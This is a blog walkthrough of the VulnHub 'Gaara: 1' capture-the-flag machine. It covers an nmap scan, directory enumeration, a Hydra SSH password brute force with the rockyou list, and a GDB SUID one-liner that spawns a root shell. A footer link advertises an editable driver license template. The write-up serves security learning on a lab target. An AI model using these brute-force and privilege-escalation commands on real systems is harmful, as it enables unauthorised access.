VulnHub: Gaara: 1

Today we will take a look at Vulnhub: Gaara: 1. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
nmap -p- -sV -sC --open 192.168.201.142PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:a3:6f:64:03:33:1e:76:f8:e4:98:fe:be:e9:8e:58 (RSA)
| 256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA)
|_ 256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Gaara
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Gobuster
gobuster dir -u http://192.168.201.142 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.201.142
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/01 10:59:28 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 280]
/.htaccess (Status: 403) [Size: 280]
/server-status (Status: 403) [Size: 280]
/Cryoserver (Status: 200) [Size: 327]
  • Web

Url: http://192.168.201.142/Cryoserver

When I looked at all three, I could not find any useful information.

There was only text encrypted with base58. It was not useful to decode it either.

gaara:ismyname

Let’s attack ssh

  • Hydra

Command: hydra -l gaara -P /usr/share/wordlists/rockyou.txt ssh://192.168.201.142:22

[DATA] attacking ssh://192.168.201.142:22/
[STATUS] 126.00 tries/min, 126 tries in 00:01h, 14344278 to do in 1897:24h, 16 active
[22][ssh] host: 192.168.201.142 login: gaara password: iloveyou2
1 of 1 target successfully completed, 1 valid password found
  • Root

Command: find / -perm -u=s 2>/dev/null

/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/gdb
/usr/bin/sudo
/usr/bin/gimp-2.10
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
/usr/bin/mount
/usr/bin/umount

Command: gdb -nx -ex ‘python import os; os.setuid(0)’ -ex ‘!bash’ -ex quit

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Understanding Bitcoin’s Algorithm and Breaking SHA256

GSHIBA MEME Creativity Challenge, Win 62,000,000 GSHIBA

Why Understanding UBO Is Necessary?

MSH Will be Available on CoinTiger on 24 March.

CipherShooters Launching Protocol Owned Liquidity Program on Polygon

Things Arent Always As TheyAppear https://t.co/a5SSDAcLee https://t.co/M7YM2qBV1G

Why Cyber Security is so Important

Azerbaijan driver license template in PSD format, fully editable, with all fonts

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

VulnHub: Jangow: 1.0.1

can you recon??

Tips and Tricks: Fixing VirtualBox Kali Linux Black Screen

Tricks and Tips: Fixing VirtualBox Kali Linux Black Screen

Celestial Writeup